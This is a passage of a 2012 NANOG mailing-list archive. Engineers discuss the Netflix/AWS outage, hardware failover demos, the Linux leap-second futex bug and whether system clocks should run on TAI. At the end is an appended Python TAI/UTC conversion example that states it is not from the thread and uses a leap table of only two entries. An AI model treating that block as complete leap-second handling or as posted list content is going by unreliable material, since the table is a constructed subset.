> The "it can't happen" is almost guaranteed to happen. ;-) And when it does,
> it'll often interact in ways we can't predict or sometimes even understand.

Seconded.
There are also aerospace and nuclear and failure analysis books which are good, but I often encourage people to start with that one.

> As for pulling the plug to test stuff. I recall a demo at Netapps in the
> early 00's. They were talking about their fault tolerance and how great it
> was. So I walked up to their demo array and said, "So, it shouldn't be a
> problem if I pulled this drive right here?" Before I could the salesperson
> or tech guy, can't remember, told me to stop. He didn't want to risk it.
>
> That right there said loads about their confidence in their own system.

I worked for a Sun clone vendor (Axil) for a while and took some of our systems and storage to Comdex one year in the 90s. We had a RAID unit (Mylex controller) we had just introduced. Beforehand, I made REALLY REALLY SURE that the pull-the-disk and pull-the-redundant-power tricks worked. And showed them to people with the "Please keep in mind that this voids the warranty, but here we *rip* go...". All of the other server vendors were giving me dirty looks for that one. Apparently I sold a few systems that way.

You have to watch for connector wear-out and things like that, but ...

All the clusters I've built, I've insisted on a burn-in time plug pull test on all the major components. We caught things with those from time to time. Especially with N+1, if it is really N+0 due to a bug or flaw you need to know that...

--
-george william herbert
george.herbert at gmail.com

From mooregr at greenms.com Mon Jul 2 16:15:10 2012
From: mooregr at greenms.com (Greg D. Moore)
Date: Mon, 02 Jul 2012 17:15:10 -0400
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org>
Message-ID:

At 05:04 PM 7/2/2012, George Herbert wrote:
>On Mon, Jul 2, 2012 at 12:43 PM, Greg D. Moore wrote:
> > At 03:08 PM 7/2/2012, George Herbert wrote:
> >
> > If folks have not read it, I would suggest reading Normal Accidents by
> > Charles Perrow.
> >
> > The "it can't happen" is almost guaranteed to happen. ;-) And when it does,
> > it'll often interact in ways we can't predict or sometimes even understand.
>
>Seconded.

I figured you had probably read it. :-)

>There are also aerospace and nuclear and failure analysis books which
>are good, but I often encourage people to start with that one.
>
> > As for pulling the plug to test stuff. I recall a demo at Netapps in the
> > early 00's. They were talking about their fault tolerance and how great it
> > was. So I walked up to their demo array and said, "So, it shouldn't be a
> > problem if I pulled this drive right here?" Before I could the salesperson
> > or tech guy, can't remember, told me to stop. He didn't want to risk it.
> >
> > That right there said loads about their confidence in their own system.
>
>I worked for a Sun clone vendor (Axil) for a while and took some of
>our systems and storage to Comdex one year in the 90s. We had a RAID
>unit (Mylex controller) we had just introduced. Beforehand, I made
>REALLY REALLY SURE that the pull-the-disk and pull-the-redundant-power
>tricks worked. And showed them to people with the "Please keep in
>mind that this voids the warranty, but here we *rip* go...". All of
>the other server vendors were giving me dirty looks for that one.
>Apparently I sold a few systems that way.

I can imagine. Back when we were testing a cluster from MicronPC, the techs were in our office and they encouraged us to do that. It was reassuring.

>You have to watch for connector wear-out and things like that, but ...
>
>All the clusters I've built, I've insisted on a burn-in time plug pull
>test on all the major components. We caught things with those from
>time to time. Especially with N+1, if it is really N+0 due to a bug
>or flaw you need to know that...
About 7 years back, we were about to move a production platform to a cluster+SAN that an outside vendor had installed. I was brought in at the last minute to lead the project. Before we did the move, I said, "Umm, has anyone tried a remote reboot of the servers?" "Oh they rebooted fine when we were at the datacenter with the vendor. We're good." I repeated my question and finally did the old, "Ok, I know I'm being a pain, but please, let's just try it once, remotely before we're committed."

So we rebooted, and waited, and waited, and waited. It took a trip out to the datacenter (we couldn't afford good remote KVM tools back then) to see that the server was trying to mount stuff off of something on the network. At first we couldn't figure out what it was. Finally realized it was looking for files on the vendor's laptop. So of course it had worked fine when the vendor was at the datacenter. Despite all that, the vendor still denied it being their problem.

Anyway, enough reminiscing. Things happen. We can only do so much to prevent them, and never assume.

>--
>-george william herbert
>george.herbert at gmail.com

Greg D. Moore
http://greenmountainsoftware.wordpress.com/
CEO QuiCR: Quick, Crowdsourced Responses.
http://www.quicr.net

From smb at cs.columbia.edu Mon Jul 2 17:34:08 2012
From: smb at cs.columbia.edu (Steven Bellovin)
Date: Mon, 2 Jul 2012 18:34:08 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF1C291.80307@armoredpackets.com>
References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com>
Message-ID:

On Jul 2, 2012, at 11:47 AM, AP NANOG wrote:
> Do you happen to know all the kernels and versions affected by this?
>
>

See http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html

--Steve Bellovin, https://www.cs.columbia.edu/~smb

From smb at cs.columbia.edu Mon Jul 2 17:39:50 2012
From: smb at cs.columbia.edu (Steven Bellovin)
Date: Mon, 2 Jul 2012 18:39:50 -0400
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org>
Message-ID:

On Jul 2, 2012, at 3:43 PM, Greg D. Moore wrote:
> At 03:08 PM 7/2/2012, George Herbert wrote:
>
> If folks have not read it, I would suggest reading Normal Accidents by Charles Perrow.

Strong second to that suggestion.

--Steve Bellovin, https://www.cs.columbia.edu/~smb

From egon at egon.cc Mon Jul 2 18:03:58 2012
From: egon at egon.cc (James Downs)
Date: Mon, 2 Jul 2012 16:03:58 -0700
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk>
Message-ID: <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc>

On Jul 2, 2012, at 1:20 PM, david raistrick wrote:

> Amazon resources are controlled (from a consumer viewpoint) by API - that API is also used by amazon's internal toolkits that support ELB (and RDS..). Those (http accessed) API interfaces were unavailable for a good portion of the outages.

Right, and other toolkits like boto. Each AZ has a different endpoint (url), and as I have no resources running in East, I saw no problems with the API endpoints I use. So, as you note, US-EAST Region was "not controllable".

> I know nothing of the netflix side of it - but that's what -we- saw.
> (and that caused all us-east RDS instances in every AZ to appear

And, if you lose US-EAST, you need to run *somewhere*. Netflix did not cutover www.netflix.com to another Region. Why not is another question.

-j

From mysidia at gmail.com Mon Jul 2 19:46:42 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Mon, 2 Jul 2012 19:46:42 -0500
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com>
Message-ID:

On 7/2/12, Steven Bellovin wrote:
> On Jul 2, 2012, at 11:47 AM, AP NANOG wrote:
>> Do you happen to know all the kernels and versions affected by this?
> See
> http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html
> --Steve Bellovin, https://www.cs.columbia.edu/~smb

Someone should write a dastardly system clock daemon to cause the insertion of frequent spurious positive leap seconds, followed by the spurious insertion of negative leap seconds.

For testing purposes... any application which crashes under such a test should be repaired or not used in any critical capacity

--
-JH

From joly at punkcast.com Mon Jul 2 19:52:08 2012
From: joly at punkcast.com (Joly MacFie)
Date: Mon, 2 Jul 2012 20:52:08 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com>
Message-ID:

On Mon, Jul 2, 2012 at 8:46 PM, Jimmy Hess wrote:
>
> Someone should write a dastardly system clock daemon to cause the
> insertion of frequent spurious positive leap seconds, followed by the
> spurious insertion of negative leap seconds.
>
>

Chaos time bandit?

--
---------------------------------------------------------------
Joly MacFie 218 565 9365 Skype:punkcast
WWWhatsup NYC - http://wwwhatsup.com
http://pinstand.com - http://punkcast.com
VP (Admin) - ISOC-NY - http://isoc-ny.org
--------------------------------------------------------------
-

From rodrick.brown at gmail.com Mon Jul 2 21:19:18 2012
From: rodrick.brown at gmail.com (Rodrick Brown)
Date: Mon, 2 Jul 2012 22:19:18 -0400
Subject: FYI Netflix is down
In-Reply-To: <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc>
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc>
Message-ID:

On Jul 2, 2012, at 7:03 PM, James Downs wrote:

>
> On Jul 2, 2012, at 1:20 PM, david raistrick wrote:
>
>> Amazon resources are controlled (from a consumer viewpoint) by API - that API is also used by amazon's internal toolkits that support ELB (and RDS..). Those (http accessed) API interfaces were unavailable for a good portion of the outages.
>
> Right, and other toolkits like boto.
> Each AZ has a different endpoint (url), and as I have no resources running in East, I saw no problems with the API endpoints I use. So, as you note, US-EAST Region was "not controllable".
>
>> I know nothing of the netflix side of it - but that's what -we- saw. (and that caused all us-east RDS instances in every AZ to appear
>
>
> And, if you lose US-EAST, you need to run *somewhere*. Netflix did not cutover www.netflix.com to another Region. Why not is another question.

At which point are you guys going to realize that no matter how much resiliency, redundancy and fault tolerance you plan into an infrastructure there is always the unforeseen that just doesn't make any sense to plan for. Four major decision factors are cost, complexity, time and failure rate. At some point a business needs to focus on its core business. IT like any other business resource has to be managed efficiently and its sole purpose is for the enablement of said business, nothing more.

Some of the posts here are highly laughable and so unrealistic. People are acting as if Netflix is part of some critical service; they stream movies, for Christ's sake. Some acceptable level of loss is fine for 99.99% of Netflix's user base, just like cable, electricity and running water. I suffer a few hours of losses each year from those services; it sucks, yes, but is it the end of the world? No..

This horse is dead!

>

From sean at donelan.com Mon Jul 2 21:27:39 2012
From: sean at donelan.com (Sean Donelan)
Date: Mon, 2 Jul 2012 22:27:39 -0400 (EDT)
Subject: Northern Virginia 9-1-1 service after storm
Message-ID:

Probably not as interesting as talking about Amazon/Netflix.
http://www.washingtonpost.com/local/after-storm-911-phone-service-remains-spotty/2012/07/02/gJQA33dHJW_story.html

Fairfax County's 911 emergency center operated at just half capacity Monday as Verizon struggled to figure out why both its primary and backup power systems failed after Friday night's storm and left much of Northern Virginia without 911 service through the weekend.

From egon at egon.cc Mon Jul 2 21:57:04 2012
From: egon at egon.cc (James Downs)
Date: Mon, 2 Jul 2012 19:57:04 -0700
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc>
Message-ID: <7CEE65E1-A4D6-44B3-8686-4222F436D9A6@egon.cc>

On Jul 2, 2012, at 7:19 PM, Rodrick Brown wrote:

> People are acting as if Netflix is part of some critical service; they stream movies, for Christ's sake. Some acceptable level of loss is fine for 99.99% of Netflix's user base, just like cable, electricity and running water. I suffer a few hours of losses each year from those services; it sucks, yes, but is it the end of the world? No..

You missed the point.

From itsmemattchung at gmail.com Mon Jul 2 22:28:05 2012
From: itsmemattchung at gmail.com (Matt Chung)
Date: Mon, 2 Jul 2012 22:28:05 -0500
Subject: Contributing to the community
Message-ID:

I've been so fortunate and appreciative over the years to have colleagues (many of whom I consider my close friends) cultivate my career by providing sound advice that I will continue to pass on. In addition to those I've known personally, I have gleaned a substantial amount of information through many of you who've contributed to these threads, blogs, and so on.
Within the organizations I've worked for, I have always been an advocate for sharing knowledge in order for the company to grow collectively; I truly believe it's infectious. But I digress...

At my previous company (regional WISP) as a network engineer, I was able to get buy-in from the partners to conduct training for our call center in an effort to better support our customers. By institutionalizing a methodical approach to troubleshooting (and performing root cause analysis), we can filter out many potential issues (i.e. why check if there is network connectivity if you are getting an HTTP response - ruled out the lower stack).

That was great, however... despite contributing to my organization, I've always felt that I haven't performed due diligence when it comes to contributing back to the network/IT community as an entity. Excuses have been made ("I don't have time") on my part and I realized that everyone here is a working professional as well. I've never been an active participant like many of you.

As a person who is passionate about this field (as well as a working professional), how do you find the time in order to contribute? Do you ever feel that the post may be redundant? Another factor I've always taken into consideration was the fact that although I may be knowledgeable and proficient in one facet, someone out there is the true expert (i.e. assisted in developing the RFC) and has a deeper understanding than I do (so I feel my contribution may be inadequate).

--
-Matt Chung

From hmurray at megapathdsl.net Mon Jul 2 23:24:29 2012
From: hmurray at megapathdsl.net (Hal Murray)
Date: Mon, 02 Jul 2012 21:24:29 -0700
Subject: FYI Netflix is down
Message-ID: <20120703042429.17434800039@ip-64-139-1-69.sjc.megapath.net>

George Herbert said:
> I worked for a Sun clone vendor (Axil) for a while and took some of our
> systems and storage to Comdex one year in the 90s. We had a RAID unit
> (Mylex controller) we had just introduced.
> Beforehand, I made REALLY REALLY
> SURE that the pull-the-disk and pull-the-redundant-power tricks worked. And
> showed them to people with the "Please keep in mind that this voids the
> warranty, but here we *rip* go...". All of the other server vendors were
> giving me dirty looks for that one. Apparently I sold a few systems that
> way.

:) Nice. Thanks.

Many years ago, I worked for one of DEC's research groups. We built a network using FDDI 4B/5B link technology based on AMD TAXI chips. (They were state of the art back then.) The switches were 3U(?) boxes with 12 ports. It took a rack of 6 or 8 of them in the phone closet to cover a floor. Workstations had 2 cables plugged into different switches. In theory, we covered any single point of failure.

My office was near the phone closet. I got to watch my boss give demos to visiting VIPs. He was pretty good at it. In the middle of explaining things, he would grab a power cord and yank it. Blinka-blinka-blinka and the remaining switches would reconfigure and go back to work. (It took under a second.)

It was interesting to watch the VIPs. Most of them got it: the network really could recover quickly. The interesting ones had a telco background. They were really surprised. The concept of disrupting live traffic for something as insignificant as a demo was off scale in their culture.

It was just a research lab. We were used to eating our own dog food.

----------

"Greg D. Moore" said:
> If folks have not read it, I would suggest reading Normal Accidents by
> Charles Perrow.

+1

> The "it can't happen" is almost guaranteed to happen. ;-) And when it
> does, it'll often interact in ways we can't predict or sometimes even
> understand.

My memory of that sort of event is roughly... (see above for context)

The hardware broke and turned a vanilla packet into a super-long packet. My FPGA code was supposed to catch that case and do something sane. It was never tested and didn't work. It poured crap all over memory.
Needless to say, things went downhill from there.

Easy to spot in hindsight. None of us thought that was an interesting case while we were testing.

--
These are my opinions. I hate spam.

From george.herbert at gmail.com Tue Jul 3 01:06:33 2012
From: george.herbert at gmail.com (George Herbert)
Date: Mon, 2 Jul 2012 23:06:33 -0700
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc>
Message-ID: <19823192-9E77-48B2-9E27-64886FC938C2@gmail.com>

On Jul 2, 2012, at 7:19 PM, Rodrick Brown wrote:

> People are acting as if Netflix is part of some critical service; they stream movies, for Christ's sake. Some acceptable level of loss is fine for 99.99% of Netflix's user base, just like cable, electricity and running water. I suffer a few hours of losses each year from those services; it sucks, yes, but is it the end of the world? No..

Actually calculating - understanding - cost of downtime, and what variations on that exist over time, are keys to reliability engineering.

But if you plan to cover X failure scenarios and only cover X/2 failure scenarios due to implementation glitches you goofed.

The right answer may be "relax and accept the downtime" and it may be "spend $10 million to avoid most of these". If you haven't thought it through and quantified, do so...

George William Herbert
Sent from my iPhone

From mpalmer at hezmatt.org Tue Jul 3 02:27:14 2012
From: mpalmer at hezmatt.org (Matthew Palmer)
Date: Tue, 3 Jul 2012 17:27:14 +1000
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF1C8B6.6010503@mtcc.com>
References: <23616229.12018.1341245044739.JavaMail.root@benjamin.baylink.com> <4FF1C8B6.6010503@mtcc.com>
Message-ID: <20120703072714.GG2221@hezmatt.org>

On Mon, Jul 02, 2012 at 09:13:42AM -0700, Michael Thomas wrote:
> My centos 6/64 running 3.0 seemed to weather it too. I'm not quite
> clear on what I should be looking for to classify it as being "broken" though.

The problems I saw were related to programs that use futex(2) (Java, MySQL, Chromium, in my personal experience) chewing up lots of CPU because the futex system call wasn't quite doing what it was supposed to be doing (waking up threads when they were OK to proceed) and instead constantly waking the threads up, having the threads go "OK, so my lock is clear and I'm ready to go?", the kernel saying "oh, no, sorry" and the thread going back to sleep again -- only to be woken up again immediately. Sort of an object lesson in why busy-wait locks suck.

- Matt

--
The main advantages of Haynes and Chilton manuals are that they cost $15, where the factory manuals cost $100 and up, and that they will tell you how to use two hammers, a block of wood, and a meerkat to replace "special tool no. 2-112-A"
-- Matt Roberds in asr.

From bdha at mirrorshades.net Tue Jul 3 03:41:21 2012
From: bdha at mirrorshades.net (Bryan Horstmann-Allen)
Date: Tue, 3 Jul 2012 04:41:21 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <20120703072714.GG2221@hezmatt.org>
References: <23616229.12018.1341245044739.JavaMail.root@benjamin.baylink.com> <4FF1C8B6.6010503@mtcc.com> <20120703072714.GG2221@hezmatt.org>
Message-ID: <20120703084121.GA13597@lab.pobox.com>

+------------------------------------------------------------------------------
| On 2012-07-03 17:27:14, Matthew Palmer wrote:
|
| The problems I saw were related to programs that use futex(2) (Java, MySQL,
| Chromium, in my personal experience) chewing up lots of CPU because the
| futex system call wasn't quite doing what it was supposed to be doing
| (waking up threads when they were OK to proceed) and instead constantly
| waking the threads up, having the threads go "OK, so my lock is clear and
| I'm ready to go?", the kernel saying "oh, no, sorry" and the thread going
| back to sleep again -- only to be woken up again immediately. Sort of an
| object lesson in why busy-wait locks suck.

A good dig into the problem, and previous problems with that code:

http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html

Cheers.
--
bdha
cyberpunk is dead. long live cyberpunk.

From wolfgang.rupprecht at gmail.com Tue Jul 3 03:54:12 2012
From: wolfgang.rupprecht at gmail.com (Wolfgang S. Rupprecht)
Date: Tue, 03 Jul 2012 01:54:12 -0700
Subject: F-ckin Leap Seconds, how do they work?
References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com>
Message-ID: <878vf1i5sb.fsf@arbol.wsrcc.com>

Steven Bellovin writes:
> See
> http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html

Maybe we should stop wrenching the poor system time back and forth.
We no longer add or subtract daylight savings time (or timezones) to the kernel time, why do we do it with leapseconds? We should really move the leapseconds correction into the display routines like DST and timezones already are. I believe the Olson time code already has ifdefs for doing this. I wonder why the system's internal time isn't run that way.

-wolfgang
--
g+: https://plus.google.com/114566345864337108516/about

From owen at delong.com Tue Jul 3 04:03:10 2012
From: owen at delong.com (Owen DeLong)
Date: Tue, 3 Jul 2012 02:03:10 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <878vf1i5sb.fsf@arbol.wsrcc.com>
References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com>
Message-ID: <779D9856-CAC8-478E-BB7F-96913F8E6D6D@delong.com>

DST is a time-zone specific phenomenon. Leap seconds are changes to the actual core time. UTC moves with leap seconds. It doesn't move with DST or other timezone weirdnesses.

The system clock needs to be UTC, not UTC ± some offset stuck somewhere that keeps some form of running tally of the current leap second offset since the epoch.

Owen

On Jul 3, 2012, at 1:54 AM, Wolfgang S. Rupprecht wrote:

>
> Steven Bellovin writes:
>> See
>> http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html
>
> Maybe we should stop wrenching the poor system time back and forth. We
> no longer add or subtract daylight savings time (or timezones) to the
> kernel time, why do we do it with leapseconds? We should really move
> the leapseconds correction into the display routines like DST and
> timezones already are. I believe the Olson time code already has ifdefs
> for doing this.
> I wonder why the system's internal time isn't run that way.
>
> -wolfgang
> --
> g+: https://plus.google.com/114566345864337108516/about
>

From saku at ytti.fi Tue Jul 3 04:31:03 2012
From: saku at ytti.fi (Saku Ytti)
Date: Tue, 3 Jul 2012 12:31:03 +0300
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <878vf1i5sb.fsf@arbol.wsrcc.com>
References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com>
Message-ID: <20120703093103.GA9947@pob.ytti.fi>

On (2012-07-03 01:54 -0700), Wolfgang S. Rupprecht wrote:

> kernel time, why do we do it with leapseconds? We should really move
> the leapseconds correction into the display routines like DST and

Yes. TAI time natively and presentation uses leap lookup tables to convert to UTC.

Unixtime is not monotonically increasing, which is incredibly broken by design.

http://en.wikipedia.org/wiki/Unixtime#TAI-based_variant
http://cr.yp.to/libtai.html

--
++ytti

From dot at dotat.at Tue Jul 3 06:02:58 2012
From: dot at dotat.at (Tony Finch)
Date: Tue, 3 Jul 2012 12:02:58 +0100
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com>
Message-ID:

Jimmy Hess wrote:
>
> Someone should write a dastardly system clock daemon to cause the
> insertion of frequent spurious positive leap seconds, followed by the
> spurious insertion of negative leap seconds.
> > For testing purposes... any application which crashes under such a > test, should be repaired or not used in any critical capacity For testing applications you can try libfaketime. Testing systems is a bit harder... https://github.com/wolfcw/libfaketime Tony. -- f.anthony.n.finch http://dotat.at/ FitzRoy, Sole: West or southwest 4 or 5, occasionally 6. Moderate or rough. Occasional rain or drizzle, fog patches. Moderate or good, occasionally very poor. From dot at dotat.at Tue Jul 3 06:06:15 2012 From: dot at dotat.at (Tony Finch) Date: Tue, 3 Jul 2012 12:06:15 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <878vf1i5sb.fsf@arbol.wsrcc.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> Message-ID: Wolfgang S. Rupprecht wrote: > I wonder why the system's internal time isn't run that way. For compatibility with software that does time calculations without using the crappy libc time API. Tony. -- f.anthony.n.finch http://dotat.at/ Humber, Thames, Dover, Wight: South 4 or 5. Slight or moderate. Occasional rain or drizzle, fog patches. Moderate, occasionally very poor. 
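The TAI-native clock with a leap lookup table that Saku proposes above, beside the POSIX clock behaviour the thread comes back to later (59 -> 59 -> 00, and intervals that measure a second long or short), as an added example that is not code from the thread, from libtai or from any project named here; LEAP_TABLE is a constructed subset of the IERS leap history and all function names are assumed:

```python
"""A TAI-native clock with a leap-second lookup table, beside the POSIX
(Unix) clock that repeats a second instead.

Added example; not code from the thread, from libtai, or from any project
named on the list.  LEAP_TABLE is a constructed subset of the IERS history
(only the entries around the 2012-06-30 leap second) and the function
names are my own.
"""
from datetime import datetime, timedelta, timezone

_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)

# (POSIX time of 00:00:00 UTC just after a leap, TAI-UTC in effect from then on)
LEAP_TABLE = [
    (1230768000, 34),  # 2009-01-01T00:00:00Z
    (1341100800, 35),  # 2012-07-01T00:00:00Z, the leap second this thread is about
]
OFFSET_BEFORE_TABLE = 33  # TAI-UTC in effect before the first entry (from 2006)
GPS_MINUS_TAI = -19       # GPS time = TAI - 19 s; TAI-UTC was 19 s when GPS started (1980)


def tai_to_utc(tai):
    """Map a TAI second count (1970 origin, every SI second counted, nothing
    removed) to (posix_seconds, is_leap_second).

    TAI never goes backwards.  During a positive leap second POSIX time has
    no value for 23:59:60, so the POSIX second 23:59:59 is reported twice."""
    offset = OFFSET_BEFORE_TABLE
    for boundary_posix, offset_after in LEAP_TABLE:
        boundary_tai = boundary_posix + offset_after
        if offset_after > offset and tai == boundary_tai - 1:
            # the inserted second 23:59:60 UTC: same POSIX value as 23:59:59
            return boundary_posix - 1, True
        if tai < boundary_tai:
            break
        # a negative leap (offset_after < offset) needs no special case:
        # POSIX simply never reports the dropped 23:59:59
        offset = offset_after
    return tai - offset, False


def utc_label(tai):
    """ISO-8601 UTC label for a TAI instant; can say 23:59:60 where POSIX cannot."""
    posix, is_leap = tai_to_utc(tai)
    dt = _EPOCH + timedelta(seconds=posix)
    if is_leap:
        return dt.strftime("%Y-%m-%dT%H:%M") + ":60Z"
    return dt.strftime("%Y-%m-%dT%H:%M:%SZ")


def posix_to_tai(posix):
    """Inverse mapping.  Lossy: during a positive leap second two TAI instants
    share one POSIX value, and this returns the earlier one."""
    offset = OFFSET_BEFORE_TABLE
    for boundary_posix, offset_after in LEAP_TABLE:
        if posix < boundary_posix:
            break
        offset = offset_after
    return posix + offset


def gps_time(tai):
    """GPS system time: a constant offset from TAI, no leap seconds applied."""
    return tai + GPS_MINUS_TAI


def clock_readings(tai_start, count):
    """POSIX readings a process polling once per SI second would see from
    tai_start on.  Shows the 59 -> 59 -> 00 repeat discussed in the thread."""
    return [tai_to_utc(tai_start + i)[0] for i in range(count)]


def is_strictly_increasing(readings):
    return all(b > a for a, b in zip(readings, readings[1:]))


def interval_lengths(tai_start, tai_end):
    """Elapsed seconds over [tai_start, tai_end] as TAI and as POSIX would
    compute them; they differ by one across each leap second."""
    return tai_end - tai_start, tai_to_utc(tai_end)[0] - tai_to_utc(tai_start)[0]


if __name__ == "__main__":
    leap_tai = 1341100834  # 2012-06-30T23:59:60Z
    for t in range(leap_tai - 2, leap_tai + 3):
        posix, _ = tai_to_utc(t)
        print(f"TAI {t}  POSIX {posix}  UTC {utc_label(t)}  GPS {gps_time(t)}")
    readings = clock_readings(leap_tai - 2, 5)
    print("POSIX readings:", readings, "monotonic:", is_strictly_increasing(readings))
    tai_len, posix_len = interval_lengths(leap_tai - 3, leap_tai + 3)
    print(f"{tai_len} SI seconds across the leap look like {posix_len} POSIX seconds")
```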
